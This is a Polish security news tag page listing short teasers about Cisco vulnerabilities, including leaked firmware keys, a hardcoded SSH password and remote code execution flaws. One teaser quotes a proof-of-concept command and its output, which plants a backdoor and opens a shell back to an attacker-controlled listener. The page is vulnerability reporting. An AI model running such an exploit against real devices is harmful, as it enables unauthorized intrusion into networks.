-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Tag: Cisco

Ciekawostka: certyfikat + klucz prywatny Huawei znaleziono w firmware switcha Cisco

05 lipca 2019, 13:38 | W biegu | 1 komentarz

Świeża analiza w tym miejscu. Po zautomatyzowanej analizie firmware urządzenia Cisco SG250 Smart Switch badaczy frapowało pytanie „kim jest tajemniczy gary.wu1(at)huawei.com ?” widoczny na jednym z certyfikatów (warto zauważyć, że do certyfikatu udało się również znaleźć klucz prywatny): Badacze zgłosili tę ciekawostkę do Cisco, które opublikowało stosowną informację. Tutaj z kolei…

Czytaj dalej »

Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia

18 maja 2019, 17:08 | W biegu | komentarze 2

Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu: $ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123…

Czytaj dalej »

Komunikator Cisco WebEx – można wykonać kod z uprawnieniami SYSTEM

26 października 2018, 15:10 | W biegu | 0 komentarzy

Ogólna informacja tutaj. Co jest wymagane? 1. Podatna wersja klienta (uwaga: podatności prawdopodobnie nie da się wykorzystać na Windows 10). 2. Dowolne konto lokalne (lub dowolne konto domenowe) Co osiągamy? Wykonanie dowolnego kodu z uprawnieniami SYSTEM na komputerze gdzie działa WebEx. Czyli przykładowo – mam dowolne konto domenowe, skanuję teraz…

Czytaj dalej »

Zahardcodowane hasło do ssh na jednym z komponentów firmy Cisco

08 marca 2018, 21:21 | W biegu | 0 komentarzy

Cisco załatało niedawno co najmniej dwa krytyczne błędy, jeden z nich to zahardcowane hasło na ssh w: Cisco Prime Collaboration Provisioning. Wprawdzie nie daje ono roota, ale istnieje też możliwość podniesienia uprawnień. Drugi problem to już bezpośrednia możliwość dostępu na roota (przecież web serwer musi pracować z uprawnieniami root, prawda? :)…

Czytaj dalej »

Nowa seria bugów – można przejąć Cisco przez SNMP

14 lipca 2017, 20:58 | W biegu | 1 komentarz

Cisco załatało właśnie kilka podatności w obsłudze popularnego protokołu SNMP. Podatna jest obsługa wszystkich wersji – SNMP v1, v2c oraz v3: The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE Software contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system…

Czytaj dalej »

Cisco ASA – krytyczna podatność umożliwiająca przejęcie kontroli nad urządzeniem

19 października 2016, 21:06 | W biegu | 0 komentarzy

Cisco ogłosiło właśnie załatanie podatności klasy Buffer Overflow we flagowym produkcie ASA: Całość polega na wysłaniu odpowiednio spreparowanego pakietu NetBIOS: An attacker could exploit this vulnerability by sending a crafted NetBIOS packet in response to a NetBIOS probe sent by the ASA software. An exploit could allow the attacker to…

Czytaj dalej »

Odczyt wrażliwych danych z pamięci routerów / serwerów VPN – ponad 800000 podatnych adresów IP, 14000 w Polsce

24 września 2016, 22:56 | W biegu | 0 komentarzy

Projekt skanujący podatne serwery VPN – chodzi o niedawno wykrytą podatność umożliwiającą nieuwierzytelniony odczyt wrażliwych informacji z pamięci na urządzeniach Cisco. W pierwszym linku znajdziecie też wizualizacje jak ta poniżej, czy możliwość zamówienia bezpłatnego raportu o własnej sieci. –ms

Czytaj dalej »

Cisco łata „heartbleed-a” na system IOS – lista podatnych systemów

19 września 2016, 21:54 | W biegu | 0 komentarzy

Niedawno pisaliśmy o podatności umożliwiającej nieuwierzytelniony i zdalny odczyt z pamięci wybranych urządzeń Cisco, a właśnie doczekaliśmy się patcha. Podatność otrzymała wysoki score w skali CVSS (Base: 7.8/10): Producent wymienia jako podatne następujące systemy: All Cisco products running an affected release of Cisco IOS Software All Cisco products running an…

Czytaj dalej »